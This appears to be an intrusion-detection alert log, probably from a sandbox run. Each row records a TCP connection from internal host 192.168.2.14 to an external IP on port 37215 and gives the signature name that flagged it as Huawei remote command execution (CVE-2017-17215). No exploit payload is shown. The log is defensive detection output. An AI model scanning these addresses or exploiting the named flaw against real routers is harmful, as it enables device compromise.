                                            06/14/24-10:43:50.110804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913237215192.168.2.14156.108.63.186
                                            06/14/24-10:43:41.898031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4980237215192.168.2.14156.74.28.27
                                            06/14/24-10:43:58.289123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5900837215192.168.2.14197.249.20.31
                                            06/14/24-10:43:39.790310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372837215192.168.2.14197.178.226.117
                                            06/14/24-10:44:16.735080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629637215192.168.2.1441.1.194.110
                                            06/14/24-10:44:02.381161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478237215192.168.2.1441.166.213.178
                                            06/14/24-10:44:06.470877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410037215192.168.2.14156.78.210.49
                                            06/14/24-10:44:10.548173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567837215192.168.2.14197.132.165.138
                                            06/14/24-10:43:36.702475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4412037215192.168.2.1441.151.195.87
                                            06/14/24-10:44:24.941883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430837215192.168.2.1441.132.218.190
                                            06/14/24-10:43:37.763365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562837215192.168.2.1441.172.255.30
                                            06/14/24-10:44:04.421226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576437215192.168.2.14156.99.25.100
                                            06/14/24-10:44:20.807331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5720837215192.168.2.14156.115.36.251
                                            06/14/24-10:43:54.198582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637437215192.168.2.1441.163.64.40
                                            06/14/24-10:43:50.069691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685437215192.168.2.1441.244.165.32
                                            06/14/24-10:43:43.942329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990037215192.168.2.14197.59.146.202
                                            06/14/24-10:43:54.182925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341237215192.168.2.1441.19.217.180
                                            06/14/24-10:44:26.997432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564237215192.168.2.14156.249.117.186
                                            06/14/24-10:43:39.790036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489637215192.168.2.1441.119.2.223
                                            06/14/24-10:43:58.292709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650837215192.168.2.1441.69.188.246
                                            06/14/24-10:43:45.968681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6065437215192.168.2.14197.224.158.154
                                            06/14/24-10:43:45.984831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3332437215192.168.2.14156.113.143.74
                                            06/14/24-10:44:10.547702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573237215192.168.2.14156.116.9.6
                                            06/14/24-10:44:20.805425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771237215192.168.2.1441.196.124.57
                                            06/14/24-10:44:06.472522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3402037215192.168.2.14197.22.248.168
                                            06/14/24-10:44:18.763524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754237215192.168.2.14197.186.14.238
                                            06/14/24-10:44:10.563869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174437215192.168.2.14197.87.28.85
                                            06/14/24-10:43:43.967438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177237215192.168.2.14197.24.29.80
                                            06/14/24-10:44:04.420663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5654237215192.168.2.1441.13.251.30
                                            06/14/24-10:43:41.849228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4173437215192.168.2.14156.178.127.53
                                            06/14/24-10:44:29.024796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599637215192.168.2.1441.17.77.147
                                            06/14/24-10:43:34.663341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3970037215192.168.2.14156.205.118.79
                                            06/14/24-10:43:45.967230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951437215192.168.2.14197.10.182.24
                                            06/14/24-10:43:36.717947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681837215192.168.2.1441.36.144.189
                                            06/14/24-10:44:14.669746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344437215192.168.2.1441.218.9.86
                                            06/14/24-10:44:31.092319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187237215192.168.2.14197.254.196.95
                                            06/14/24-10:44:12.647017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4406637215192.168.2.14156.233.5.75
                                            06/14/24-10:44:10.542973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5692037215192.168.2.14156.246.165.66
                                            06/14/24-10:44:31.089885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3546637215192.168.2.1441.175.137.76
                                            06/14/24-10:43:34.677530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4352837215192.168.2.14156.13.174.42
                                            06/14/24-10:44:22.859729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3329437215192.168.2.14197.119.7.60
                                            06/14/24-10:43:50.115322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331237215192.168.2.14156.84.192.117
                                            06/14/24-10:44:00.323400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240637215192.168.2.14156.9.145.253
                                            06/14/24-10:43:58.290162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083637215192.168.2.14156.198.218.5
                                            06/14/24-10:43:34.660444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839037215192.168.2.14197.207.188.68
                                            06/14/24-10:44:29.013765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792437215192.168.2.14156.171.223.105
                                            06/14/24-10:43:43.972013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176437215192.168.2.14197.193.113.163
                                            06/14/24-10:44:31.083715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5784837215192.168.2.14156.61.172.179
                                            06/14/24-10:43:41.900048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791037215192.168.2.14197.86.169.113
                                            06/14/24-10:43:34.662725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853237215192.168.2.1441.162.130.70
                                            06/14/24-10:43:36.717746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587237215192.168.2.14156.157.145.42
                                            06/14/24-10:44:31.092965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3696837215192.168.2.14197.116.57.177
                                            06/14/24-10:44:00.339790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5017237215192.168.2.14197.114.23.2
                                            06/14/24-10:43:37.763498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034037215192.168.2.14197.219.163.129
                                            06/14/24-10:44:02.368657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740037215192.168.2.1441.253.113.117
                                            06/14/24-10:44:00.342668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600837215192.168.2.1441.81.122.121
                                            06/14/24-10:44:29.012033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606437215192.168.2.14197.247.203.84
                                            06/14/24-10:44:29.023711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4978637215192.168.2.14197.252.167.187
                                            06/14/24-10:44:29.014658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984237215192.168.2.1441.186.25.114
                                            06/14/24-10:43:41.848799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101637215192.168.2.14156.65.80.241
                                            06/14/24-10:44:26.986510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313837215192.168.2.14197.222.9.70
                                            06/14/24-10:43:41.849078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777837215192.168.2.14197.117.74.16
                                            06/14/24-10:44:10.549517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668037215192.168.2.14156.246.205.14
                                            06/14/24-10:44:22.861159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5889437215192.168.2.14156.210.37.84
                                            06/14/24-10:44:08.502983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618037215192.168.2.14156.6.204.222
                                            06/14/24-10:44:12.616281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563837215192.168.2.14197.200.216.142
                                            06/14/24-10:44:14.688742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099437215192.168.2.14197.178.212.199
                                            06/14/24-10:43:52.163549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950637215192.168.2.14197.233.220.12
                                            06/14/24-10:43:34.677263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5809037215192.168.2.14197.191.254.222
                                            06/14/24-10:43:36.704232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3790837215192.168.2.1441.180.194.12
                                            06/14/24-10:44:22.880343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105037215192.168.2.14156.239.241.29
                                            06/14/24-10:44:29.023096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003237215192.168.2.1441.112.21.200
                                            06/14/24-10:43:39.791388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921037215192.168.2.1441.241.196.232
                                            06/14/24-10:44:35.180948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365237215192.168.2.1441.93.119.70
                                            06/14/24-10:44:14.672683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667437215192.168.2.14156.166.129.143
                                            06/14/24-10:44:24.941844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5968237215192.168.2.1441.213.146.20
                                            06/14/24-10:44:31.056259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813837215192.168.2.14197.197.171.136
                                            06/14/24-10:44:20.806467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5175237215192.168.2.1441.211.23.136
                                            06/14/24-10:44:06.472285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004837215192.168.2.1441.76.200.239
                                            06/14/24-10:44:10.568080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300837215192.168.2.1441.153.21.193
                                            06/14/24-10:44:08.520212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092637215192.168.2.1441.241.228.211
                                            06/14/24-10:43:34.677769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5486437215192.168.2.14197.136.204.131
                                            06/14/24-10:44:31.053136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283437215192.168.2.1441.48.245.0
                                            06/14/24-10:44:24.917180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839237215192.168.2.14156.71.157.145
                                            06/14/24-10:43:36.702225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512837215192.168.2.1441.45.205.77
                                            06/14/24-10:43:41.846197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739037215192.168.2.1441.30.5.248
                                            06/14/24-10:44:00.324683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6071637215192.168.2.1441.4.190.191
                                            06/14/24-10:44:16.717867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040637215192.168.2.14197.58.66.74
                                            06/14/24-10:44:22.859267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5632437215192.168.2.14156.92.72.101
                                            06/14/24-10:44:29.014361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4633837215192.168.2.1441.92.222.225
                                            06/14/24-10:43:50.068895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491437215192.168.2.14197.24.140.18
                                            06/14/24-10:43:52.160368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722637215192.168.2.1441.88.130.134
                                            06/14/24-10:44:02.381847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360637215192.168.2.1441.252.145.110
                                            06/14/24-10:44:10.544168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530837215192.168.2.1441.200.251.32
                                            06/14/24-10:44:31.052026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5333837215192.168.2.14156.155.68.159
                                            06/14/24-10:44:16.718024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246237215192.168.2.1441.73.13.147
                                            06/14/24-10:44:33.134056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752837215192.168.2.14156.180.161.134
                                            06/14/24-10:44:20.828891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210837215192.168.2.14156.212.66.238
                                            06/14/24-10:44:04.423808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5943437215192.168.2.1441.234.125.130
                                            06/14/24-10:44:26.998615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725437215192.168.2.14156.12.99.8
                                            06/14/24-10:44:14.682060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908637215192.168.2.14197.156.173.230
                                            06/14/24-10:43:34.661651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503837215192.168.2.1441.83.153.150
                                            06/14/24-10:43:56.226563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4448237215192.168.2.14156.82.247.122
                                            06/14/24-10:44:16.716269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3784237215192.168.2.14156.208.117.157
                                            06/14/24-10:44:16.733530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503637215192.168.2.14156.116.137.20
                                            06/14/24-10:44:04.421355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553637215192.168.2.14156.207.138.194
                                            06/14/24-10:44:33.152662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951837215192.168.2.14156.106.111.214
                                            06/14/24-10:44:24.943300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4498637215192.168.2.1441.174.12.120
                                            06/14/24-10:44:31.056504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598037215192.168.2.1441.198.222.28
                                            06/14/24-10:43:58.295359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5567237215192.168.2.1441.6.58.214
                                            06/14/24-10:43:36.705370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895237215192.168.2.1441.64.196.190
                                            06/14/24-10:44:33.148426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296237215192.168.2.14156.162.99.201
                                            06/14/24-10:44:12.640556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259637215192.168.2.1441.103.92.63
                                            06/14/24-10:43:48.022299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092637215192.168.2.1441.64.43.196
                                            06/14/24-10:43:36.703869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5493437215192.168.2.1441.225.231.84
                                            06/14/24-10:44:12.618248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021437215192.168.2.1441.9.44.43
                                            06/14/24-10:44:20.805942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806237215192.168.2.1441.97.255.133
                                            06/14/24-10:44:22.881857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3471637215192.168.2.1441.179.192.240
                                            06/14/24-10:43:43.944136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441637215192.168.2.14197.132.35.60
                                            06/14/24-10:44:14.671967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844037215192.168.2.14156.178.59.54
                                            06/14/24-10:44:10.568897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578837215192.168.2.14156.11.70.93
                                            06/14/24-10:43:58.291197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589837215192.168.2.1441.25.16.23
                                            06/14/24-10:44:24.934845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619837215192.168.2.1441.1.223.18
                                            06/14/24-10:44:26.977754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652837215192.168.2.14197.56.117.39
                                            06/14/24-10:43:54.199081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6062437215192.168.2.14156.32.102.31
                                            06/14/24-10:44:14.686582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081637215192.168.2.14197.235.102.122
                                            06/14/24-10:44:14.669575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726437215192.168.2.14156.117.0.172
                                            06/14/24-10:44:00.341620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351637215192.168.2.14156.249.151.9
                                            06/14/24-10:44:06.450928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5801437215192.168.2.1441.146.14.72
                                            06/14/24-10:44:10.569271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652437215192.168.2.14197.136.34.89
                                            06/14/24-10:43:50.073151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4159837215192.168.2.14156.228.124.47
                                            06/14/24-10:44:12.614369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265037215192.168.2.14156.63.236.215
                                            06/14/24-10:44:20.805474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5280037215192.168.2.1441.132.56.76
                                            06/14/24-10:44:08.504676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974437215192.168.2.1441.127.221.16
                                            06/14/24-10:44:22.879661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835837215192.168.2.14156.192.200.254
                                            06/14/24-10:44:00.321514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314637215192.168.2.14197.31.238.197
                                            06/14/24-10:43:50.110947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985437215192.168.2.14197.84.46.231
                                            06/14/24-10:44:31.053337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4761237215192.168.2.14156.224.110.155
                                            06/14/24-10:43:56.243753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439237215192.168.2.14197.108.76.131
                                            06/14/24-10:44:12.641138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324637215192.168.2.14156.103.70.124
                                            06/14/24-10:44:02.369123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721637215192.168.2.1441.186.100.60
                                            06/14/24-10:44:33.133207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432637215192.168.2.14156.243.61.149
                                            06/14/24-10:43:56.245947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947837215192.168.2.14197.72.112.125
                                            06/14/24-10:44:18.779929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3847037215192.168.2.1441.174.114.20
                                            06/14/24-10:43:39.792336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678237215192.168.2.1441.86.191.225
                                            06/14/24-10:44:14.685486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549637215192.168.2.14156.244.89.69
                                            06/14/24-10:44:31.087747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5667237215192.168.2.1441.216.3.183
                                            06/14/24-10:44:00.337717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037837215192.168.2.14156.113.244.240
                                            06/14/24-10:44:29.027152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5651237215192.168.2.14197.238.38.144
                                            06/14/24-10:44:35.181713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665437215192.168.2.1441.81.58.87
                                            06/14/24-10:43:54.183418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4057837215192.168.2.14197.178.113.243
                                            06/14/24-10:44:02.383127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4213637215192.168.2.14197.113.60.158
                                            06/14/24-10:44:06.471881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5552037215192.168.2.14156.57.210.77
                                            06/14/24-10:44:26.979340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201637215192.168.2.14197.204.119.179
                                            06/14/24-10:44:04.409151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4647037215192.168.2.14156.200.181.48
                                            06/14/24-10:44:26.978656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063837215192.168.2.14197.237.113.8
                                            06/14/24-10:44:18.780013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983237215192.168.2.14197.193.127.253
                                            06/14/24-10:43:41.846918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977637215192.168.2.1441.2.173.196
                                            06/14/24-10:44:33.150854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761437215192.168.2.1441.149.13.123
                                            06/14/24-10:43:52.149592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016037215192.168.2.14156.15.218.187
                                            06/14/24-10:43:37.761745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778837215192.168.2.14156.221.28.61
                                            06/14/24-10:44:33.131772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184437215192.168.2.14156.0.244.0
                                            06/14/24-10:43:39.788615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883837215192.168.2.14156.53.161.228
                                            06/14/24-10:44:10.546633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374637215192.168.2.14156.196.127.117
                                            06/14/24-10:44:08.503520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255237215192.168.2.14197.154.41.51
                                            06/14/24-10:43:48.028056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5337237215192.168.2.1441.138.27.150
                                            06/14/24-10:43:50.073121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993437215192.168.2.14197.218.212.172
                                            06/14/24-10:44:31.091285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873037215192.168.2.14156.192.226.62
                                            06/14/24-10:44:14.682392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5307237215192.168.2.1441.150.137.185
                                            06/14/24-10:44:33.150471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4220437215192.168.2.14156.191.8.185
                                            06/14/24-10:44:31.052423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450637215192.168.2.14156.180.228.42
                                            06/14/24-10:44:24.915263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385637215192.168.2.14197.24.43.15
                                            06/14/24-10:44:08.518710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6033237215192.168.2.14156.3.58.181
                                            06/14/24-10:44:33.131258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428037215192.168.2.14197.28.217.22
                                            06/14/24-10:43:52.148303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223637215192.168.2.14197.136.111.221
                                            06/14/24-10:43:48.045951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4575837215192.168.2.14197.123.229.67
                                            06/14/24-10:44:26.980621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861037215192.168.2.14156.54.15.44
                                            06/14/24-10:44:02.383617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469037215192.168.2.14156.80.216.96
                                            06/14/24-10:44:08.517929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911637215192.168.2.1441.250.38.18
                                            06/14/24-10:43:54.182139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542637215192.168.2.14197.205.147.45
                                            06/14/24-10:44:06.470703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479037215192.168.2.14197.144.167.48
                                            06/14/24-10:43:48.028854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411837215192.168.2.14197.174.60.66
                                            06/14/24-10:44:02.369151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065037215192.168.2.14156.168.242.167
                                            06/14/24-10:43:48.019425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835237215192.168.2.14197.226.170.21
                                            06/14/24-10:44:00.341543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875837215192.168.2.14197.124.78.93
                                            06/14/24-10:43:43.940509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721437215192.168.2.14156.217.142.194
                                            06/14/24-10:43:41.849676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003837215192.168.2.1441.25.141.131
                                            06/14/24-10:44:22.860372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3494437215192.168.2.1441.71.57.254
